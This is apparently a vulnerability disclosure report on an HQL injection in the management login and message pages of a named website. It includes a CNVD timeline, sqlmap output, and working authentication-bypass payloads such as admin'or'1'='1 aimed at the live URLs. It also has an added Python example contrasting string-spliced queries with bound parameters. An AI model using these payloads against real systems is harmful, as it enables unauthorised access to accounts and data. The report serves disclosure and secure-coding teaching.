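2015-07-29: Details reported to the vendor; awaiting vendor handling
2015-07-31: Vendor confirmed; details disclosed only to the vendor
2015-08-10: Details disclosed to core white hats and experts in related fields
2015-08-20: Details disclosed to regular white hats
2015-08-30: Details disclosed to intern white hats
2015-09-14: Details disclosed to the public
HQL injection, a bit of a pain to work with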
http://open.17wo.cn:8080/open17wo/
Open
http://open.17wo.cn:8080/open17wo/manage/messageManagerloadMessage.action?id=96
Enter '
Enter ;'and'1'='1
SQLMap cannot dump the database
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=96' AND 1533=1533 AND 'qaID'='qaID
---
[22:14:14] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5
At the login form on the home page, entering a' as the username returns a 500 error
Main error message:
HTTP Status 500 - expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']; nested exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']
type: Exception report
Captured login requests:
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=a&userPass=a
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27&userPass=a
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27or%271%27=%271&userPass=a
Response:
"{\"state\":\"5\"}"
This indicates a successful login. http://open.17wo.cn:8080/open17wo/
Login succeeds with username and password admin'or'1'='1
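Severity: Medium
Vulnerability Rank: 7
Confirmed: 2015-07-31 16:18
CNVD has confirmed the situation described; it has been forwarded via CNCERT to the Guangdong sub-center, which will follow up and coordinate with the site's operator to handle it.
None yet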
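Added example, not part of the original report or the vendor's code: the 500 error above shows the login query being assembled by splicing userName and userPass into the query text, and the sketch below reproduces that pattern next to a bound-parameter version. It assumes a stand-in: SQL on an in-memory sqlite3 table (table name, row and password are constructed) in place of HQL on Hibernate/MySQL; the function names are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory table standing in for the User entity (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userName TEXT, userPass TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concat(db, user_name, user_pass):
    """Vulnerable pattern: input becomes part of the query text."""
    query = ("SELECT userName FROM users n "
             "WHERE n.userName='%s' and n.userPass='%s'" % (user_name, user_pass))
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        # An unbalanced quote breaks parsing; the site surfaced this as HTTP 500.
        return None


def login_bound(db, user_name, user_pass):
    """Hardened pattern: values are bound and never reach the query parser.

    In Hibernate the equivalent is a named parameter (:name) in the HQL
    string, bound with Query.setParameter.
    """
    query = "SELECT userName FROM users n WHERE n.userName = ? AND n.userPass = ?"
    return db.execute(query, (user_name, user_pass)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the report: a lone quote, then the quote-balanced string.
    for name, pw in [("a'", "a"), ("admin'or'1'='1", "a")]:
        print(repr(name), "concat:", login_concat(db, name, pw),
              "bound:", login_bound(db, name, pw))
```

Because AND binds tighter than OR, the spliced predicate reads userName='admin' OR ('1'='1' AND userPass='a'), so the password check no longer constrains the admin row; with bound parameters the same input is compared as a literal username and matches nothing.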